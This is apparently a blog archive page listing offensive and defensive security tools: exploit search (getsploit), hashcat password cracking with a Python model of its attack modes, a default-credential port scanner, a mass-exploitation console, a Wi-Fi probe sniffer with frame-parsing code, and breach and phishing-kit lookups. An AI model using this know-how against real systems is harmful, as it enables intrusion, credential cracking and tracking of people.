Showing posts with label Mac.

getsploit - Command line utility for searching and downloading exploits


Command-line search and download tool for the Vulners database, inspired by searchsploit. It lets you search online for exploits across the most popular collections (Exploit-DB, Metasploit, Packetstorm and others) and, its most useful feature, download exploit source straight into your working directory. Anything it fetches is third-party code from public collections: read it before you run it, and run it only in a lab you control.

Python version
The utility was tested on Python 2.6, 2.7 and 3.6. If you find any bugs, open an issue on the project's GitHub page.

How to use

Search
# git clone https://github.com/vulnersCom/getsploit
# cd getsploit
# ./getsploit.py wordpress 4.7.0
Total found exploits: 8
Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit%20AND%20wordpress%204.7.0
+----------------------+--------------------------------+----------------------------------------------------+
| ID | Exploit Title | URL |
+======================+================================+====================================================+
| PACKETSTORM:141039 | WordPress 4.7.0 / 4.7.1 Insert | https://vulners.com/packetstorm/PACKETSTORM:141039 |
| | PHP Code Injection | |
+----------------------+--------------------------------+----------------------------------------------------+
| EDB-ID:41308 | WordPress 4.7.0/4.7.1 Plugin | https://vulners.com/exploitdb/EDB-ID:41308 |
| | Insert PHP - PHP Code | |
| | Injection | |
+----------------------+--------------------------------+----------------------------------------------------+
| EDB-ID:41223 | WordPress 4.7.0/4.7.1 - | https://vulners.com/exploitdb/EDB-ID:41223 |
| | Unauthenticated Content | |
| | Injection (PoC) | |
+----------------------+--------------------------------+----------------------------------------------------+
| PACKETSTORM:140893 | WordPress 4.7.0 / 4.7.1 REST | https://vulners.com/packetstorm/PACKETSTORM:140893 |
| | API Privilege Escalation | |
+----------------------+--------------------------------+----------------------------------------------------+
| PACKETSTORM:140902 | WordPress 4.7.0 / 4.7.1 | https://vulners.com/packetstorm/PACKETSTORM:140902 |
| | Content Injection / Code | |
| | Execution | |
+----------------------+--------------------------------+----------------------------------------------------+
| PACKETSTORM:140901 | WordPress 4.7.0 / 4.7.1 | https://vulners.com/packetstorm/PACKETSTORM:140901 |
| | Content Injection Proof Of | |
| | Concept | |
+----------------------+--------------------------------+----------------------------------------------------+
| EDB-ID:41224 | WordPress 4.7.0/4.7.1 - | https://vulners.com/exploitdb/EDB-ID:41224 |
| | Unauthenticated Content | |
| | Injection Arbitrary Code | |
| | Execution | |
+----------------------+--------------------------------+----------------------------------------------------+
| SSV-92637 | WordPress REST API content | https://vulners.com/seebug/SSV-92637 |
| | injection | |
+----------------------+--------------------------------+----------------------------------------------------+

Save exploit files
# ./getsploit.py -m wordpress 4.7.0
Total found exploits: 8
Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit%20AND%20wordpress%204.7.0
+----------------------+--------------------------------+----------------------------------------------------+
| ID | Exploit Title | URL |
+======================+================================+====================================================+
| PACKETSTORM:141039 | WordPress 4.7.0 / 4.7.1 Insert | https://vulners.com/packetstorm/PACKETSTORM:141039 |
| | PHP Code Injection | |
+----------------------+--------------------------------+----------------------------------------------------+
| EDB-ID:41308 | WordPress 4.7.0/4.7.1 Plugin | https://vulners.com/exploitdb/EDB-ID:41308 |
| | Insert PHP - PHP Code | |
| | Injection | |
+----------------------+--------------------------------+----------------------------------------------------+
| EDB-ID:41223 | WordPress 4.7.0/4.7.1 - | https://vulners.com/exploitdb/EDB-ID:41223 |
| | Unauthenticated Content | |
| | Injection (PoC) | |
+----------------------+--------------------------------+----------------------------------------------------+
| PACKETSTORM:140893 | WordPress 4.7.0 / 4.7.1 REST | https://vulners.com/packetstorm/PACKETSTORM:140893 |
| | API Privilege Escalation | |
+----------------------+--------------------------------+----------------------------------------------------+
| PACKETSTORM:140902 | WordPress 4.7.0 / 4.7.1 | https://vulners.com/packetstorm/PACKETSTORM:140902 |
| | Content Injection / Code | |
| | Execution | |
+----------------------+--------------------------------+----------------------------------------------------+
| PACKETSTORM:140901 | WordPress 4.7.0 / 4.7.1 | https://vulners.com/packetstorm/PACKETSTORM:140901 |
| | Content Injection Proof Of | |
| | Concept | |
+----------------------+--------------------------------+----------------------------------------------------+
| EDB-ID:41224 | WordPress 4.7.0/4.7.1 - | https://vulners.com/exploitdb/EDB-ID:41224 |
| | Unauthenticated Content | |
| | Injection Arbitrary Code | |
| | Execution | |
+----------------------+--------------------------------+----------------------------------------------------+
| SSV-92637 | WordPress REST API content | https://vulners.com/seebug/SSV-92637 |
| | injection | |
+----------------------+--------------------------------+----------------------------------------------------+

# ls
LICENSE README.md getsploit.py wordpress-470
# cd wordpress-470
# ls
edb-id41223.txt edb-id41224.txt edb-id41308.txt packetstorm140893.txt packetstorm140901.txt packetstorm140902.txt packetstorm141039.txt ssv-92637.txt

Local database
If your Python build includes the sqlite3 module (it is built in on most systems), you can use --update to download the whole exploit database to your machine and then search it offline with --local (-l).
# ./getsploit.py --update
Downloading getsploit database archive. Please wait, it may take time. Usually around 5-10 minutes.
219642496/219642496 [100.00%]
Unpacking database.
Database download complete. Now you may search exploits using --local key './getsploit.py -l wordpress 4.7'


Hashcat v3.6.0 - World's Fastest and Most Advanced Password Recovery Utility


hashcat is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 200 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and OSX, and has facilities to help enable distributed password cracking.

Installation
Download the latest release and unpack it in the desired location. Please remember to use 7z x when unpacking the archive from the command line to ensure full file paths remain intact.

GPU Driver requirements:
  • AMD GPUs on Windows require "AMD Radeon Software Crimson Edition" (15.12 or later)
  • AMD GPUs on Linux require "AMDGPU-PRO Driver" (16.40 or later)
  • Intel CPUs require "OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)
  • Intel GPUs on Windows require "OpenCL Driver for Intel Iris and Intel HD Graphics"
  • Intel GPUs on Linux require "OpenCL 2.0 GPU Driver Package for Linux" (2.0 or later)
  • NVIDIA GPUs require "NVIDIA Driver" (367.x or later)


Features

  • World's fastest password cracker
  • World's first and only in-kernel rule engine
  • Free
  • Open-Source (MIT License)
  • Multi-OS (Linux, Windows and OSX)
  • Multi-Platform (CPU, GPU, DSP, FPGA, etc., everything that comes with an OpenCL runtime)
  • Multi-Hash (Cracking multiple hashes at the same time)
  • Multi-Devices (Utilizing multiple devices in same system)
  • Multi-Device-Types (Utilizing mixed device types in same system)
  • Supports distributed cracking networks (using overlay)
  • Supports interactive pause / resume
  • Supports sessions
  • Supports restore
  • Supports reading password candidates from file and stdin
  • Supports hex-salt and hex-charset
  • Supports automatic performance tuning
  • Supports automatic keyspace ordering markov-chains
  • Built-in benchmarking system
  • Integrated thermal watchdog
  • 200+ Hash-types implemented with performance in mind
  • ... and much more

Algorithms

  • MD4
  • MD5
  • Half MD5 (left, mid, right)
  • SHA1
  • SHA-224
  • SHA-256
  • SHA-384
  • SHA-512
  • SHA-3 (Keccak)
  • BLAKE2b-512
  • SipHash
  • Skip32
  • RIPEMD-160
  • Whirlpool
  • DES (PT = $salt, key = $pass)
  • 3DES (PT = $salt, key = $pass)
  • ChaCha20
  • GOST R 34.11-94
  • GOST R 34.11-2012 (Streebog) 256-bit
  • GOST R 34.11-2012 (Streebog) 512-bit
  • md5($pass.$salt)
  • md5($salt.$pass)
  • md5(unicode($pass).$salt)
  • md5($salt.unicode($pass))
  • md5($salt.$pass.$salt)
  • md5($salt.md5($pass))
  • md5($salt.md5($salt.$pass))
  • md5($salt.md5($pass.$salt))
  • md5(md5($pass))
  • md5(md5($pass).md5($salt))
  • md5(strtoupper(md5($pass)))
  • md5(sha1($pass))
  • sha1($pass.$salt)
  • sha1($salt.$pass)
  • sha1(unicode($pass).$salt)
  • sha1($salt.unicode($pass))
  • sha1(sha1($pass))
  • sha1($salt.sha1($pass))
  • sha1(md5($pass))
  • sha1($salt.$pass.$salt)
  • sha1(CX)
  • sha256($pass.$salt)
  • sha256($salt.$pass)
  • sha256(unicode($pass).$salt)
  • sha256($salt.unicode($pass))
  • sha512($pass.$salt)
  • sha512($salt.$pass)
  • sha512(unicode($pass).$salt)
  • sha512($salt.unicode($pass))
  • HMAC-MD5 (key = $pass)
  • HMAC-MD5 (key = $salt)
  • HMAC-SHA1 (key = $pass)
  • HMAC-SHA1 (key = $salt)
  • HMAC-SHA256 (key = $pass)
  • HMAC-SHA256 (key = $salt)
  • HMAC-SHA512 (key = $pass)
  • HMAC-SHA512 (key = $salt)
  • PBKDF2-HMAC-MD5
  • PBKDF2-HMAC-SHA1
  • PBKDF2-HMAC-SHA256
  • PBKDF2-HMAC-SHA512
  • MyBB
  • phpBB3
  • SMF (Simple Machines Forum)
  • vBulletin
  • IPB (Invision Power Board)
  • WBB (Woltlab Burning Board)
  • osCommerce
  • xt:Commerce
  • PrestaShop
  • MediaWiki B type
  • WordPress
  • Drupal 7
  • Joomla
  • PHPS
  • Django (SHA-1)
  • Django (PBKDF2-SHA256)
  • Episerver
  • ColdFusion 10+
  • Apache MD5-APR
  • MySQL
  • PostgreSQL
  • MSSQL
  • Oracle H: Type (Oracle 7+)
  • Oracle S: Type (Oracle 11+)
  • Oracle T: Type (Oracle 12+)
  • Sybase
  • hMailServer
  • DNSSEC (NSEC3)
  • IKE-PSK
  • IPMI2 RAKP
  • iSCSI CHAP
  • CRAM-MD5
  • MySQL CRAM (SHA1)
  • PostgreSQL CRAM (MD5)
  • SIP digest authentication (MD5)
  • WPA
  • WPA2
  • NetNTLMv1
  • NetNTLMv1+ESS
  • NetNTLMv2
  • Kerberos 5 AS-REQ Pre-Auth etype 23
  • Kerberos 5 TGS-REP etype 23
  • Netscape LDAP SHA/SSHA
  • FileZilla Server
  • LM
  • NTLM
  • Domain Cached Credentials (DCC), MS Cache
  • Domain Cached Credentials 2 (DCC2), MS Cache 2
  • DPAPI masterkey file v1 and v2
  • MS-AzureSync PBKDF2-HMAC-SHA256
  • descrypt
  • bsdicrypt
  • md5crypt
  • sha256crypt
  • sha512crypt
  • bcrypt
  • scrypt
  • OSX v10.4
  • OSX v10.5
  • OSX v10.6
  • OSX v10.7
  • OSX v10.8
  • OSX v10.9
  • OSX v10.10
  • iTunes backup < 10.0
  • iTunes backup >= 10.0
  • AIX {smd5}
  • AIX {ssha1}
  • AIX {ssha256}
  • AIX {ssha512}
  • Cisco-ASA MD5
  • Cisco-PIX MD5
  • Cisco-IOS $1$ (MD5)
  • Cisco-IOS type 4 (SHA256)
  • Cisco $8$ (PBKDF2-SHA256)
  • Cisco $9$ (scrypt)
  • Juniper IVE
  • Juniper NetScreen/SSG (ScreenOS)
  • Juniper/NetBSD sha1crypt
  • Fortigate (FortiOS)
  • Samsung Android Password/PIN
  • Windows Phone 8+ PIN/password
  • GRUB 2
  • CRC32
  • RACF
  • Radmin2
  • Redmine
  • PunBB
  • OpenCart
  • Atlassian (PBKDF2-HMAC-SHA1)
  • Citrix NetScaler
  • SAP CODVN B (BCODE)
  • SAP CODVN F/G (PASSCODE)
  • SAP CODVN H (PWDSALTEDHASH) iSSHA-1
  • PeopleSoft
  • PeopleSoft PS_TOKEN
  • Skype
  • WinZip
  • 7-Zip
  • RAR3-hp
  • RAR5
  • AxCrypt
  • AxCrypt in-memory SHA1
  • PDF 1.1 - 1.3 (Acrobat 2 - 4)
  • PDF 1.4 - 1.6 (Acrobat 5 - 8)
  • PDF 1.7 Level 3 (Acrobat 9)
  • PDF 1.7 Level 8 (Acrobat 10 - 11)
  • MS Office <= 2003 MD5
  • MS Office <= 2003 SHA1
  • MS Office 2007
  • MS Office 2010
  • MS Office 2013
  • Lotus Notes/Domino 5
  • Lotus Notes/Domino 6
  • Lotus Notes/Domino 8
  • Bitcoin/Litecoin wallet.dat
  • Blockchain, My Wallet
  • Blockchain, My Wallet, V2
  • 1Password, agilekeychain
  • 1Password, cloudkeychain
  • LastPass
  • Password Safe v2
  • Password Safe v3
  • KeePass 1 (AES/Twofish) and KeePass 2 (AES)
  • JKS Java Key Store Private Keys (SHA1)
  • Ethereum Wallet, PBKDF2-HMAC-SHA256
  • Ethereum Wallet, SCRYPT
  • eCryptfs
  • Android FDE <= 4.3
  • Android FDE (Samsung DEK)
  • TrueCrypt
  • VeraCrypt
  • LUKS
  • Plaintext

Attack-Modes

  • Straight *
  • Combination
  • Brute-force
  • Hybrid dict + mask
  • Hybrid mask + dict
* accepts rules
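The attack modes listed above, and the "hash:salt" input format hashcat uses for salted modes such as md5($pass.$salt) (mode 10), are easiest to understand from a reference model. The block below is an added example written for this page, not hashcat's code: it reproduces in pure Python the candidate generation of straight (-a 0), combination (-a 1), mask (-a 3) and both hybrid modes (-a 6, -a 7), then runs each against one constructed target. The wordlist, salt and target are made up for the demo; hashcat's real rule language is stood in for by plain callables.

```python
"""Reference model of hashcat's attack modes and its mode-10 hash format.

Added example (not hashcat code). Wordlist, salt and target are constructed.
"""
import hashlib
import itertools
import string
from typing import Callable, Iterable, Iterator, List, Optional

# hashcat built-in charsets: ?l ?u ?d ?s and ?a (all of them together)
CHARSETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]


def parse_mask(mask: str) -> List[str]:
    """Turn a mask such as ?l?l?d?d into one charset per position.
    A literal character is a fixed single-element position; '??' is a literal '?'."""
    positions: List[str] = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            key = mask[i + 1]
            positions.append("?" if key == "?" else CHARSETS[key])
            i += 2
        else:
            positions.append(mask[i])
            i += 1
    return positions


def mask_candidates(mask: str) -> Iterator[str]:
    """-a 3: walk the whole keyspace of a mask."""
    for combo in itertools.product(*parse_mask(mask)):
        yield "".join(combo)


def straight(words: Iterable[str], rules: Iterable[Callable[[str], str]] = ()) -> Iterator[str]:
    """-a 0: each word as-is, then each rule applied to it (rules modelled as callables)."""
    rules = list(rules)
    for w in words:
        yield w
        for rule in rules:
            yield rule(w)


def combination(left: Iterable[str], right: Iterable[str]) -> Iterator[str]:
    """-a 1: every left word concatenated with every right word."""
    right = list(right)
    for l in left:
        for r in right:
            yield l + r


def hybrid_dict_mask(words: Iterable[str], mask: str) -> Iterator[str]:
    """-a 6: word followed by every mask expansion (e.g. summer + ?d?d)."""
    tails = list(mask_candidates(mask))
    for w in words:
        for t in tails:
            yield w + t


def hybrid_mask_dict(mask: str, words: Iterable[str]) -> Iterator[str]:
    """-a 7: mask expansion followed by the word."""
    words = list(words)
    for head in mask_candidates(mask):
        for w in words:
            yield head + w


def md5_pass_salt(password: str, salt: str) -> str:
    """hashcat mode 10: md5($pass.$salt), lowercase hex."""
    return hashlib.md5((password + salt).encode("utf-8")).hexdigest()


def crack_mode10(hash_line: str, candidates: Iterable[str]) -> Optional[str]:
    """hash_line uses hashcat's 'hash:salt' input format for mode 10."""
    digest, salt = hash_line.split(":", 1)
    digest = digest.lower()
    for cand in candidates:
        if md5_pass_salt(cand, salt) == digest:
            return cand
    return None


# Constructed demo data: a short wordlist and a salted target whose plaintext is "summer17".
WORDLIST = ["password", "summer", "winter"]
SALT = "8f3a"
TARGET = md5_pass_salt("summer17", SALT) + ":" + SALT


def demo() -> dict:
    """Run one target through several modes; only modes whose keyspace contains it succeed."""
    return {
        "a0": crack_mode10(TARGET, straight(WORDLIST, [lambda w: w + "17", str.capitalize])),
        "a1": crack_mode10(TARGET, combination(WORDLIST, ["17", "2017"])),
        "a3_keyspace": sum(1 for _ in mask_candidates("?l?d")),
        "a6": crack_mode10(TARGET, hybrid_dict_mask(WORDLIST, "?d?d")),
        "a7": crack_mode10(TARGET, hybrid_mask_dict("?d?d", WORDLIST)),
    }
```

The point of the demo() results is the keyspace argument behind choosing a mode: -a 6 with ?d?d finds "summer17" because the target is word+digits, while -a 7 with the same mask never can, and a full ?l?l?l?l?l?l?d?d brute force would be 26^6 * 100 candidates for the same answer.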

Supported OpenCL runtimes

  • AMD
  • Apple
  • Intel
  • Mesa (Gallium)
  • NVidia
  • pocl

Supported OpenCL device types

  • GPU
  • CPU
  • APU
  • DSP
  • FPGA
  • Coprocessor

    portSpider - A Lightning Fast Multithreaded Network Scanner Framework With Modules


    A lightning fast multithreaded network scanner framework with modules.

    modules:
    • http - Scan for open HTTP ports and get the page titles.
    • mysql - Scan for open MySQL servers, and try to log in with the default credentials.
    • mongodb - Scan for open MongoDB instances, and check if they are password protected.
    • ssh - Scan for open SSH ports.
    • printer - Scan for open printer ports and websites.
    • gameserver - Scan for open game server ports.
    • manual - Scan custom ports.

    commands:
    • modules - List all modules.
    • use - Use a module.
    • options - Show a module's options.
    • set - Set an option.
    • run - Run the selected module.
    • back - Go back to menu.
    • exit - Shut down portSpider.

    installing:

    Debian based systems:
    $ sudo apt-get update && sudo apt-get install python3 python3-pip -y

    $ git clone https://github.com/xdavidhu/portSpider

    $ cd portSpider/

    $ python3 -m pip install -r requirements.txt

    macOS / OSX:
    $ brew install python3

    $ git clone https://github.com/xdavidhu/portSpider

    $ cd portSpider/

    $ python3 -m pip install -r requirements.txt
    NOTE: You need to have Homebrew installed before running the macOS/OSX installation.
    WARNING: portSpider is only compatible with Python 3.3 & 3.4 & 3.5 & 3.6


    pwned - A command-line tool for querying the 'Have I been pwned?' service


    A command-line tool for querying Troy Hunt's Have I been pwned? service using the hibp Node.js module.

    Installation
    npm install pwned -g

    Usage
    Usage: pwned [option | command]


    Commands:

    ba [options] <account> get all breaches for an account (username or email address)
    breaches [options] get all breaches in the system
    breach [options] <name> get a single breached site by breach name
    dc [options] get all data classes in the system
    pa [options] <email> get all pastes for an account (email address)

    Each command has its own -h (--help) option.

    Options:

    -h, --help output usage information
    -v, --version output the version number

    Examples
    Get all breaches for an account:
    $ pwned ba pleasebeclean@fingerscrossed.tld
    Good news — no pwnage found!
    Get all breaches in the system, filtering results to just the 'adobe.com' domain:
    $ pwned breaches -d adobe.com
    -
    Title: Adobe
    Name: Adobe
    Domain: adobe.com
    BreachDate: 2013-10-04
    AddedDate: 2013-12-04T00:00:00Z
    PwnCount: 152445165
    Description: In October 2013, 153 million Adobe accounts were breached with each containing an internal ID, username, email, encrypted password and a password hint in plain text. The password cryptography was poorly done and many were quickly resolved back to plain text (http://stricture-group.com/files/adobe-top100.txt). The unencrypted hints also disclosed much about the passwords (http://www.troyhunt.com/2013/11/adobe-credentials-and-serious.html), adding further to the risk that hundreds of millions of Adobe customers already faced.
    DataClasses:
    - Email addresses
    - Password hints
    - Passwords
    - Usernames
    IsVerified: true
    IsSensitive: false
    IsActive: true
    IsRetired: false
    LogoType: svg
    Get a single breached site by breach name:
    $ pwned breach MyCompany
    No breach found by that name.
    Get all the data classes in the system, returning raw JSON results for external/chained consumption:
    $ pwned dc --raw
    ["Account balances","Age groups","Astrological signs","Avatars","Bank account numbers","Banking PINs","Beauty ratings","Biometric data","Car ownership statuses","Career levels","Chat logs","Credit cards","Customer feedback","Customer interactions","Dates of birth","Device information","Device usage tracking data","Drinking habits","Drug habits","Education levels","Email addresses","Email messages","Employers","Ethnicities","Family members' names","Family plans","Financial transactions","Fitness levels","Genders","Geographic locations","Government issued IDs","Historical passwords","Home ownership statuses","Homepage URLs","Income levels","Instant messenger identities","IP addresses","Job titles","MAC addresses","Marital statuses","Names","Nicknames","Parenting plans","Partial credit card data","Passport numbers","Password hints","Passwords","Payment histories","Personal descriptions","Personal interests","Phone numbers","Physical addresses","Physical attributes","Political views","Private messages","Purchases","Races","Recovery email addresses","Relationship statuses","Religions","Reward program balances","Salutations","Security questions and answers","Sexual fetishes","Sexual orientations","Smoking habits","SMS messages","Social connections","Spoken languages","Time zones","Travel habits","User agent details","User statuses","User website URLs","Usernames","Website activity","Work habits","Years of birth"]
    Get all pastes for an email address:
    $ pwned pa nobody@nowhere.com
    -
    Source: Pastebin
    Id: xyb8vavK
    Title: null
    Date: 2015-06-01T00:16:46Z
    EmailCount: 8
    -
    Source: Pastebin
    Id: DaaFj8Be
    Title: CrackingCore - Redder04
    Date: 2015-04-05T22:22:39Z
    EmailCount: 116
    -
    Source: Pastebin
    Id: 9MAAgecd
    Title: IPTV Yabancı Combolist
    Date: 2015-02-07T15:21:00Z
    EmailCount: 244
    -
    Source: Pastebin
    Id: QMx1dPUT
    Title: null
    Date: 2015-02-02T20:45:00Z
    EmailCount: 6607
    -
    Source: Pastebin
    Id: zUFSee4n
    Title: nethingoez
    Date: 2015-01-21T15:13:00Z
    EmailCount: 312
    -
    Source: AdHocUrl
    Id: http://siph0n.in/exploits.php?id=4560
    Title: BuzzMachines.com 40k+
    Date: null
    EmailCount: 36959
    -
    Source: AdHocUrl
    Id: http://siph0n.in/exploits.php?id=4737
    Title: PayPalSucks Database 102k
    Date: null
    EmailCount: 82071

    probeSniffer - A Tool for Sniffing Unencrypted Wireless Probe Requests from Devices


    [probeSniffer ASCII-art banner]
    v2.1 by David Schütz (@xdavidhu)

    A tool for sniffing unencrypted wireless probe requests from devices:

    new in 2.1:
    • Displaying the number of hosts
    • Logging to SQLite database file
    • Settable nickname for mac addresses
    • Options to filter output by mac address
    • Capturing 'broadcast' probe requests (without SSID)

    requirements:
    • Kali Linux / Raspbian with root privileges
    • Python3 & PIP3 (probeSniffer will install the dependencies)
    • A wireless card capable of monitor mode, plus one other internet-connected interface (for vendor lookup of MAC addresses)

    options:
    • -d / do not show duplicate requests
    • -b / do not show broadcast requests
    • -f / only show requests from the specified mac address
    • --addnicks / add nicknames to mac addresses
    • --flushnicks / flush nickname database
    • --nosql / disable SQL logging completely
    • --debug / turn debug mode on
    • -h / display help menu

    installing:

    Kali Linux / Raspbian:
    $ sudo apt-get update && sudo apt-get install python3 python3-pip -y

    $ git clone https://github.com/xdavidhu/probeSniffer

    $ cd probeSniffer/

    $ python3 -m pip install -r requirements.txt
    WARNING: probeSniffer is only compatible with Python 3.3 & 3.4 & 3.5 & 3.6

    usage:
    Make sure to put your wireless interface into monitor mode first.
    $ sudo python3 probeSniffer.py [monitor-mode-interface] [options]
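What probeSniffer is actually reading off the air is the 802.11 probe-request management frame: the sender's MAC in the second address field and, in the frame body, information element 0 (SSID), which is empty for the 'broadcast' probes the 2.1 release added. The block below is an added example, not probeSniffer's code: it parses constructed frames (radiotap header assumed already stripped) and models the -d, -b and -f options as filters, so the logic runs without a monitor-mode card.

```python
"""Parse 802.11 probe-request frames and apply probeSniffer-style filters.

Added example, not probeSniffer's code. Frames are constructed bytes with the
radiotap header already removed; -d / -b / -f are modelled by filter_probes().
"""
from dataclasses import dataclass
from typing import Iterable, List, Optional

PROBE_REQUEST = (0, 4)  # 802.11 type 0 = management, subtype 4 = probe request


@dataclass
class ProbeRequest:
    source_mac: str
    ssid: str  # "" for a broadcast (wildcard) probe that names no network

    @property
    def is_broadcast(self) -> bool:
        return self.ssid == ""


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_probe_request(frame: bytes) -> Optional[ProbeRequest]:
    """Return the sender and requested SSID, or None if this is not a probe request."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    if (ftype, subtype) != PROBE_REQUEST:
        return None
    # Management header: FC(2) Duration(2) Addr1/DA(6) Addr2/SA(6) Addr3/BSSID(6) Seq(2)
    sa = frame[10:16]
    body = frame[24:]
    ssid = ""
    i = 0
    while i + 2 <= len(body):          # walk the tagged information elements
        tag, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) < length:
            break                      # truncated element: stop parsing
        if tag == 0:                   # element id 0 = SSID
            ssid = value.decode("utf-8", errors="replace")
            break
        i += 2 + length
    return ProbeRequest(mac_str(sa), ssid)


def build_probe_request(sa: bytes, ssid: bytes) -> bytes:
    """Construct a minimal probe request; used only to make offline test input."""
    header = (bytes([0x40, 0x00])      # frame control: type 0, subtype 4, no flags
              + b"\x00\x00"            # duration
              + b"\xff" * 6            # DA: broadcast
              + sa                     # SA: the probing device
              + b"\xff" * 6            # BSSID: wildcard
              + b"\x00\x00")           # sequence control
    ssid_ie = bytes([0, len(ssid)]) + ssid
    rates_ie = bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])  # supported rates 1/2/5.5/11 Mbit
    return header + ssid_ie + rates_ie


def filter_probes(frames: Iterable[bytes], hide_duplicates: bool = False,
                  hide_broadcast: bool = False, only_mac: Optional[str] = None) -> List[ProbeRequest]:
    """Apply the -d / -b / -f behaviour over a stream of raw frames."""
    seen = set()
    kept: List[ProbeRequest] = []
    for frame in frames:
        probe = parse_probe_request(frame)
        if probe is None:
            continue
        if hide_broadcast and probe.is_broadcast:
            continue
        if only_mac and probe.source_mac != only_mac.lower():
            continue
        key = (probe.source_mac, probe.ssid)
        if hide_duplicates and key in seen:
            continue
        seen.add(key)
        kept.append(probe)
    return kept


# Constructed capture: a phone probing twice for the same network and once by
# broadcast, a laptop probing once, and a beacon frame that must be ignored.
PHONE = bytes.fromhex("a4c3f0112233")
LAPTOP = bytes.fromhex("3c5ab4445566")
FRAMES = [
    build_probe_request(PHONE, b"HomeWifi"),
    build_probe_request(PHONE, b"HomeWifi"),
    build_probe_request(PHONE, b""),
    build_probe_request(LAPTOP, b"CoffeeShop"),
    bytes([0x80, 0x00]) + b"\x00" * 22 + bytes([0, 4]) + b"beac",  # beacon, subtype 8
]
```

Note that the source MAC is whatever the client puts in Addr2; modern phones randomise it while probing, which is why a nickname database keyed on MAC (the --addnicks option) only works for devices that keep a stable address.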


    massExpConsole - Collection of Tools and Exploits with a CLI UI


    Collection of Tools and Exploits with a CLI UI

    What does it do?
    • an easy-to-use user interface (cli)
    • execute any adapted exploit with process-level concurrency
    • crawler for baidu and zoomeye
    • a simple webshell manager
    • some built-in exploits (automated)
    • more to come...

    Requirements
    • GNU/Linux or macOS, or WSL (Windows Subsystem for Linux); fully tested under Kali Linux (Rolling, 2017), Ubuntu Linux (16.04 LTS) and Fedora 25 (it will work on other distros too as long as you have dealt with all dependencies)
    • proxychains4 (in $PATH), used by exploiter, requires a working socks5 proxy (you can modify its config in mec.py)
    • Java is required when using Java deserialization exploits, you might want to install openjdk-8-jre if you haven't installed it yet
    • python packages (not complete, as some third-party scripts might need other deps as well):
      • requests
      • bs4
      • beautifulsoup4
      • html5lib
      • docopt
      • pip3 install on the go
    • note that you have to install all the deps of your exploits or tools as well

    Usage
    • just run mec.py, if it complains about missing modules, install them
    • if you want to add your own exploit script (or binary file, whatever):
      • cd exploits, mkdir <yourExploitDir>
      • your exploit should take the last argument passed to it as its target, dig into mec.py to know more
      • chmod 755 <exploitBin> to make sure it can be executed by current user
      • use attack command then m to select your custom exploit
    • type help in the console to see all available features

    PhishingKitHunter - Find Phishing Kits Which Use Your Brand/Organization'S Files And Image


    Find phishing kits which use your brand/organization's files and image.
    PhishingKitHunter (or PKHunter) is a tool made for identifying phishing kits URLs used in phishing campains targeting your customers and using some of your own website files (as CSS, JS, ...). This tool - write in Python 3 - is based on the analysis of referer's URL which GET particular files on the legitimate website (as some style content) or redirect user after the phishing session. Log files (should) contains the referer URL where the user come from and where the phishing kit is deployed. PhishingKitHunter parse your logs file to identify particular and non-legitimate referers trying to get legitimate pages based on regular expressions you put into PhishingKitHunter's config file.

    Features
    • find URL where a phishing kit is deployed
    • find if the phishing kit is still up and running
    • generate a JSON report useful for external usage
    • use a hash of the phishing kit's page to identify the kit
    • use a timestamp for history
    • can use HTTP or SOCKS5 proxy

    Usage
    $ ./PhishingKitHunter-0.6.py -i LogFile2017.log -o PKHunter-report-20170502-013307.json -c conf/test.conf

    [Phishing Kit Hunter ASCII-art banner]

    -= Phishing Kit Hunter - v0.6b =-

    [+] http://badscam.org/includes/ap/?a=2
    | Timestamp: 01/May/2017:13:00:03
    | HTTP status: can't connect (HTTP Error 404: Not Found)
    [+] http://scamme.com/aple/985884e5b60732b1245fdfaf2a49cdfe/
    | Timestamp: 01/May/2017:13:00:49
    | HTTP status: can't connect (<urlopen error [Errno -2] Name or service not known>)
    [+] http://badscam-er.com/eb/?e=4
    | Timestamp: 01/May/2017:13:01:06
    | HTTP status: can't connect (<urlopen error [Errno -2] Name or service not known>)
    [+] http://assur.cam.tech/scam/brand/new/2bd5a55bc5e768e530d8bda80a9b8593/
    | Timestamp: 01/May/2017:13:01:14
    | HTTP status: UP
    | HTTP shash : 0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091
    [+] http://phish-other.eu/assur/big/phish/2be1c6afdbfc065c410d36ba88e7e4c9/
    | Timestamp: 01/May/2017:13:01:15
    | HTTP status: UP
    | HTTP shash : 2a545c4d321e3b3cbb34af62e6e6fbfbdbc00a400bf70280cb00f4f6bb0eac44
    697475it [06:41, 1208.14it/s]

    Help
    $ ./PhishingKitHunter-0.6.py --help

    [Phishing Kit Hunter ASCII-art banner]

    -= Phishing Kit Hunter - v0.6b =-

    -h --help Prints this
    -i --ifile Input logfile to analyse
    -o --ofile Output JSON report file (default: ./PKHunter-report-'date'-'hour'.json)
    -c --config Configuration file to use (default: ./conf/defaults.conf)

    JSON report example
    $ cat ./PKHunter-report-20170502-013307.json

    {
    "PK_URL": "http://badscam.org/includes/ap/?a=2",
    "PK_info": {
    "Domain": "badscam.org",
    "HTTP_sha256": "",
    "HTTP_status": "can't connect (HTTP Error 404: Not Found)",
    "date": "01/May/2017:13:00:03"
    }
    }{
    "PK_URL": "http://assur.cam.tech/scam/brand/new/2bd5a55bc5e768e530d8bda80a9b8593/",
    "PK_info": {
    "Domain": "assur.cam.tech",
    "HTTP_sha256": "0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091",
    "HTTP_status": "UP",
    "date": "01/May/2017:13:01:14"
    }
    }
    [...]

    Requirements
    • Python 3
    • requests
    • tqdm
    • json
    • PySocks

    Install
    Install the requirements
    pip install -r requirements.txt

    Configure
